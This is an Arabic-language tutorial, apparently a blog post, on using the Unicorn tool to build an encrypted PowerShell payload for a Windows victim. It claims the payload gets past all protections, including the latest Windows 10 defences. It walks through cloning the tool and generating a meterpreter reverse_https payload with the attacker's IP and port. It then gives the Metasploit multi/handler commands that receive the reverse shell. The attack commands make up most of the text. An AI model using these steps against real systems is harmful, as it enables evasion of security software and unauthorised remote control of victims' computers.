عمل بايلود غير قابل للكشف - Unicorn

عمل بايلود مشفر غير قابل للكشف

 

ماهي أداة Unicorn ؟

تم إنشاؤها بواسطة TrustedSec , هي أداة بسيطة مصممة للمساعدة في اختبار الاختراق وعمل هجمات powershell  وحقن البايلود shellcode الذي ينشىئ أتصال بينك وبين الضحية يعرف بكود برمجي يستخدم كبايلود مباشرة في الذاكرة 

سنتعرف علي كيفية انشاء بايلود مشفر باستخدام أداة Unicorn وتخطي جميع الحمايات وأيضا تخطي حمايات وندوز 10 باخر اصداراته 

الخطوة الأولى  :- 

تحميل أداة unicorn بأستخدام امر

git clone https://github.com/trustedsec/unicorn

بعد تحميل الاداة اذهب الى المسار
cd unicorn
او المكان الذي تم تحميل الأداه فيه 

لأظهار الخيارات والاوصاف لكل هجوم استخدم الامر التالي

unicorn.py --help/.

الخطوة الثانية  :-

لتكوين البايلود أستخدم الامر التالي :

 

unicorn.py windows/meterpreter/reverse_https "your ip" "port/.


ستستخدم الااداة unicorn ميتاسبليوت موديل reverse_https للهجوم

عند توليد البايلود سوف يظهر ملفين الاول powershell_attack.txt والذي سوف يتم تنفيذه بجهاز الضحية والملف الثاني unicorn.rc وهو يحتوي على الاعدادات التي سوف يتم ادخالها في الميتاسبلويت

الخطوة الثالثة  :-

تشغيل ميتاسبلويت بكتابة الامر msfconsole 
بعد تشغيل الاداة ادخل الاوامر التالية

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST your ip
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit